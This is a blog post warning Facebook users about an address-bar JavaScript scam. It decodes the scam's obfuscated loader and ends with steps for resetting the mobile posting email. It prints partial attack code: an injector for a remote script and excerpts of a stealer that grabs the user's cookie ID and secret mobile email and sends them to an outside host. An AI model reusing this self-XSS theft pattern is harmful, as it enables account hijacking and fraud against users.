Stay Safe from Fraud and Identity Theft on Facebook



Recently I came across another JavaScript exploit on Facebook. The victim is asked to paste it into the address bar, with the promise of credits for games or of becoming the admin of the pages they like. But stop, don't listen to him, because it is just fraud and a cheap social engineering hack. I recently posted a trick on how to hack pages that is simple and is also part of this trick, but in that exploit the code was only for hacking into a page. Some hackers are now also trying to get the victim's cookies and mobile email by asking him to put the code in the browser's address bar and hit Enter; that is a more modified form of the exploit. Hacking personal IDs isn't a good job if you are doing it for a bad cause or for fun. Read my fan pages hack post for more detail.
What is the personal publishing mobile email address for Facebook?
It is a unique address for every profile, and using it we can post statuses, photos, etc. on the go. We can also get one for any fan page. It looks something like uniqueword@m.facebook.com. Anyone who knows this address can post to the profile by sending email to it, which is why it has to stay secret.

Which type of code do hackers give to steal your personal email ID and cookies?
Sometimes it is simple, like javascript: ..........., but in most cases they obfuscate it so that you cannot tell what is written in it and only the browser can understand it. It is encoded as hexadecimal escape sequences (\xNN) of the ASCII characters. The basic purpose of obfuscation is to keep the source code of your hard work from being stolen, and some companies use it for security, but it can also be used for hacking. If anyone gives you code like the one below, beware: don't put it in the address bar, since it will steal your Facebook cookies as well as your unique mobile email ID for Facebook. See the code below:


javascript:var _0xbdfc=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3a\x2f\...........x65\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];varscript=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script);void(0);
(Note: I have cut some portion of the script so that others cannot steal it and use it for the wrong purpose.)
Yes, it is an obfuscated command that only the browser can understand. If I decode it, I can get the path of the third-party hosted script. We can use any available online decoder; see what I got:
http://www.new.........com/time/mobile.js
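
The decoding step described above can also be done offline, without pasting the snippet into a browser or an online service. The following is an added example, not code from the original post: a static decoder that never evaluates its input. `SAMPLE` is a constructed snippet of the same shape with a placeholder `example.invalid` URL, and `decodeHexEscapes` and `analyzeSnippet` are names chosen here.

```javascript
// Static decoder for "paste this into your address bar" snippets.
// It never evaluates the input; it only rewrites text.
const R = String.raw;
// Constructed sample in the same shape as the snippet on this page.
// The URL is a placeholder (http://example.invalid/m.js), not the one from the post.
const SAMPLE =
  R`javascript:var _0xbdfc=["\x73\x63\x72\x69\x70\x74",` +
  R`"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63",` +
  R`"\x68\x74\x74\x70\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64\x2f\x6d\x2e\x6a\x73",` +
  R`"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];` +
  R`var script=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];` +
  R`document[_0xbdfc[5]][_0xbdfc[4]](script);void(0);`;

// Turn \xNN escapes back into characters; malformed escapes (e.g. "\x6") stay as-is.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function analyzeSnippet(snippet) {
  const body = snippet.replace(/^\s*javascript:/i, "");
  // Locate the string table: var <name>=["...","..."]
  const table = /var\s+(\w+)\s*=\s*\[([^\]]*)\]/.exec(body);
  if (!table) return { strings: [], readable: body, remoteScripts: [], injectsScript: false };
  const name = table[1];
  const strings = (table[2].match(/"(?:[^"\\]|\\.)*"/g) || [])
    .map((q) => decodeHexEscapes(q.slice(1, -1)));
  // Replace every <name>[n] lookup with the quoted string it stands for.
  const rest = body.slice(table.index + table[0].length).replace(/^;/, "");
  const readable = rest.replace(new RegExp(name + "\\[(\\d+)\\]", "g"),
    (m, i) => (Number(i) < strings.length ? JSON.stringify(strings[Number(i)]) : m));
  const remoteScripts = strings.filter((s) => /^(https?:)?\/\//i.test(s));
  // Warning sign: the snippet builds a <script> element and points it at a remote URL.
  const injectsScript = ["createElement", "script", "appendChild"]
    .every((s) => strings.includes(s)) && remoteScripts.length > 0;
  return { strings, readable, remoteScripts, injectsScript };
}

const report = analyzeSnippet(SAMPLE);
console.log(report.readable);
console.log(report.remoteScripts, "injects remote script:", report.injectsScript);
```

The readable output shows the snippet does nothing except load a script from the listed URL into the current page, which then runs with the same access to the site as the logged-in user.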

That is the path of the real script. If we examine it, we will learn what it does. Simply put the obtained path in the browser address bar and you will get the information.
Some part of mobile.js:

//Append jquery library
var newjs = document.createElement('script');
newjs.setAttribute('src', 'http://s_o_c_i_a_l_g_i_f_t_s.info/jquery.js');
document.body.appendChild(newjs);
setTimeout(function(){
//Grab post form id and other stuff for posting
if(location.href == "http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/index.php")
{
alert("Wrong Page. You must paste the script into your browser's\naddress bar on any facebook tab or window.\n\n Then Hit Enter!");
return;
}
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
//grab mobiles
$.get("http://m.facebook.com/upload.php", function(data){
var mydata = data;
var mobiles;
var count = 0;
$($(mydata).find('a').filter(':contains("m.facebook.com")')).
.................
top.location.href = 'http://www.n_e_w_s_1_7_c_h_a_n_n_e_l.com/time/check.php?get=1&m=,'+insert;
});
},2000);
alert("Time Checker Processing - Please wait 2 seconds and click OK to view results.");

See the lines highlighted in red: these will appear as alerts in your browser if you put that obfuscated JavaScript in your browser address bar. I haven't shown you the whole script here for security reasons. Another smart thing: if you paste it somewhere other than Facebook, this will appear: Wrong Page. You must paste the script into your browser's\naddress bar on any facebook tab or window.\n\n Then Hit Enter!


What to do if you followed the hacker's guide and pasted the script into the browser address bar?

The answer is quite simple: just update your Facebook unique mobile email ID.
1. Go to http://m.facebook.com/upload.php
2. Log in using your Facebook email and password.
3. Reset your email id by clicking Reset Address.
